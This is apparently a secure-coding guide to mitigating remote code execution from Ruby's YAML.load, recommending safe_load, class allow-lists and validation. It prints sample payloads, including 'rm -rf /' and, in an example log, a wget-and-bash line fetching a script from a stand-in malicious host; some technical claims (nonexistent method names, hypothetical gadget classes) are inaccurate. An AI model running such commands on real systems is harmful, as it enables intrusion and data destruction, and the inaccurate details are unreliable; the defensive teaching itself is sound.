Mitigating unsafe YAML loading allowing remote code execution in Custom Ruby Implementations

Understanding the Vulnerability: `YAML.load` and Arbitrary Code Execution

The `YAML.load` method in Ruby, when used with untrusted input, presents a significant security risk. By default, it deserializes YAML data into Ruby objects. However, YAML’s extensibility allows for the inclusion of custom Ruby classes and method calls within the data itself. An attacker can craft malicious YAML payloads that, when loaded by `YAML.load`, trigger arbitrary Ruby code execution on the server. This is often achieved by leveraging Ruby’s `yaml_load` or `load_yaml` methods, which can instantiate objects and call their methods, including constructors (`initialize`) and other arbitrary methods.

Consider a scenario where your application accepts a configuration file or user-submitted data in YAML format and processes it using `YAML.load`. If this input is not rigorously validated or sanitized, an attacker could provide a payload like the following:

Malicious YAML Payload Example

This payload attempts to execute a system command, such as `ls` or `rm -rf /`, by exploiting the `Psych.load_file` (which internally uses `YAML.load`) or directly `YAML.load` with a custom class that executes shell commands in its `initialize` method.

!!ruby/object:Process
# This is a simplified example. Real-world exploits might be more complex.
# The goal is to instantiate an object that can execute arbitrary code.
# For instance, a custom class that calls `system` or `exec` in its initializer.
# Example:
# !!ruby/object:EvilClass
#   command: "ls -la /"
#
# Where EvilClass is defined as:
# class EvilClass
#   def initialize(command)
#     system(command)
#   end
# end
#
# In a direct exploit, one might try to leverage existing Ruby classes if possible,
# but custom classes are the most straightforward way to demonstrate the risk.
# A more direct, though often patched, exploit vector might involve specific
# built-in classes that have dangerous methods accessible during deserialization.
# For demonstration, let's assume a hypothetical `SystemCommand` class.
!!ruby/object:SystemCommand
command: "echo 'PWNED' >> /tmp/hacked.txt"

When `YAML.load` encounters `!!ruby/object:SystemCommand`, it attempts to instantiate a `SystemCommand` class and pass the `command` value to its constructor. If `SystemCommand` is defined to execute the provided command, arbitrary code execution is achieved.

Mitigation Strategy 1: Prefer `YAML.safe_load`

The most direct and recommended mitigation is to use `YAML.safe_load` instead of `YAML.load`. `YAML.safe_load` restricts the types of objects that can be deserialized, preventing the instantiation of arbitrary Ruby classes and thus blocking code execution vectors. It only allows basic types like strings, numbers, arrays, and hashes.

If you are using the `psych` gem (which is the default YAML parser in modern Ruby), you can use `Psych.safe_load`. If you are using an older version or a different YAML parser, ensure you are using its equivalent safe loading function.

Implementing `YAML.safe_load`

Replace all instances of `YAML.load` with `YAML.safe_load` in your codebase. For example:

Before (Vulnerable)

require 'yaml'

untrusted_yaml_data = "!!ruby/object:Process\ncmd: 'rm -rf /'\n" # Malicious payload

# This is DANGEROUS!
data = YAML.load(untrusted_yaml_data)

After (Safe)

require 'yaml'

untrusted_yaml_data = "!!ruby/object:Process\ncmd: 'rm -rf /'\n" # Malicious payload

# This is SAFE!
# Note: If the YAML contains types not allowed by safe_load, it will raise an error.
# This is the desired behavior for security.
data = YAML.safe_load(untrusted_yaml_data)

If `YAML.safe_load` raises an error due to unexpected types in the YAML, this is a strong indicator that the input might be malicious or malformed. You should log these errors and potentially reject the input entirely.

Mitigation Strategy 2: Whitelisting Allowed Types (If `safe_load` is Insufficient)

In some advanced scenarios, you might need to deserialize specific custom Ruby objects from YAML. While `YAML.safe_load` is the primary defense, if you absolutely must allow certain custom types, you can configure `YAML.safe_load` to permit only a specific whitelist of classes. This is done using the `permitted_classes` option.

Configuring `permitted_classes`

Let’s say you have a `Configuration` class that you trust and want to allow deserialization for:

class Configuration
  attr_accessor :setting1, :setting2

  def initialize(setting1, setting2)
    @setting1 = setting1
    @setting2 = setting2
  end
end

# Example of trusted YAML
trusted_yaml = "!!ruby/object:Configuration\nsetting1: value1\nsetting2: value2\n"

# Using safe_load with permitted_classes
# Note: The class must be defined *before* calling safe_load if it's not a standard type.
data = YAML.safe_load(trusted_yaml, permitted_classes: [Configuration], aliases: true)

puts data.setting1 # Output: value1
puts data.setting2 # Output: value2

The `aliases: true` option is often necessary to correctly deserialize complex structures that use YAML aliases, but ensure you understand its implications. Always be extremely cautious when whitelisting classes. The fewer classes you permit, the smaller your attack surface.

Mitigation Strategy 3: Input Validation and Sanitization

Even with `YAML.safe_load`, robust input validation and sanitization are crucial layers of defense. If your application expects specific keys and value types within the YAML structure, validate them rigorously *after* deserialization. This prevents unexpected data from being processed, even if it doesn’t lead to immediate code execution.

Post-Deserialization Validation Example

Suppose your YAML should only contain `host` and `port` for a database connection:

require 'yaml'

# Potentially malicious input, but safe_load will prevent direct RCE
# This example shows how to validate the *structure* and *content*
# even if safe_load allows basic types.
untrusted_yaml_data = <<~YAML
database:
  host: "localhost"
  port: 5432
  # attacker might add:
  # admin_command: "rm -rf /"
YAML

begin
  # Use safe_load first
  config = YAML.safe_load(untrusted_yaml_data, aliases: true)

  # Now, validate the structure and content
  if config.nil? || !config.is_a?(Hash)
    raise "Invalid YAML structure: root is not a hash."
  end

  db_config = config['database']
  if db_config.nil? || !db_config.is_a?(Hash)
    raise "Invalid YAML structure: 'database' section missing or not a hash."
  end

  host = db_config['host']
  port = db_config['port']

  if host.nil? || !host.is_a?(String)
    raise "Invalid database host: missing or not a string."
  end

  if port.nil? || !port.is_a?(Integer)
    raise "Invalid database port: missing or not an integer."
  end

  # Check for unexpected keys that might indicate an attempted exploit
  unexpected_keys = db_config.keys - ['host', 'port']
  if unexpected_keys.any?
    Rails.logger.warn("Unexpected keys found in database config: #{unexpected_keys.join(', ')}")
    # Depending on policy, you might reject the entire config here
    # raise "Unexpected configuration keys found."
  end

  puts "Database Host: #{host}"
  puts "Database Port: #{port}"

rescue Psych::SyntaxError => e
  puts "YAML Syntax Error: #{e.message}"
  # Log and reject
rescue StandardError => e
  puts "Configuration Error: #{e.message}"
  # Log and reject
end

This layered approach ensures that even if a vulnerability in the YAML parser were discovered, your application would still be protected by strict input validation.

Auditing and Monitoring

Regularly audit your codebase for any remaining uses of `YAML.load`. Implement logging for any YAML parsing errors, especially those originating from `YAML.safe_load` that indicate unexpected types or structures. Monitoring these logs can help detect attempted attacks in real-time.

Example Log Entry for a Failed Safe Load

[YYYY-MM-DD HH:MM:SS] WARN: YAML parsing error for input from IP 192.168.1.100.
Error: Unexpected node type: !!ruby/object:EvilClass
Input snippet: !!ruby/object:EvilClass
  command: "wget http://malicious.com/payload.sh -O /tmp/payload.sh; bash /tmp/payload.sh"
User Agent: Mozilla/5.0 ...
Request Path: /api/upload_config

This kind of log entry is a critical alert. It signifies that an attempt was made to inject a dangerous YAML structure, and your `YAML.safe_load` successfully prevented it, but an attack was indeed attempted.

Conclusion

The `YAML.load` vulnerability is a classic example of insecure deserialization. By consistently using `YAML.safe_load`, employing strict whitelisting when necessary, and implementing comprehensive post-deserialization validation, you can effectively mitigate the risk of remote code execution in your custom Ruby implementations.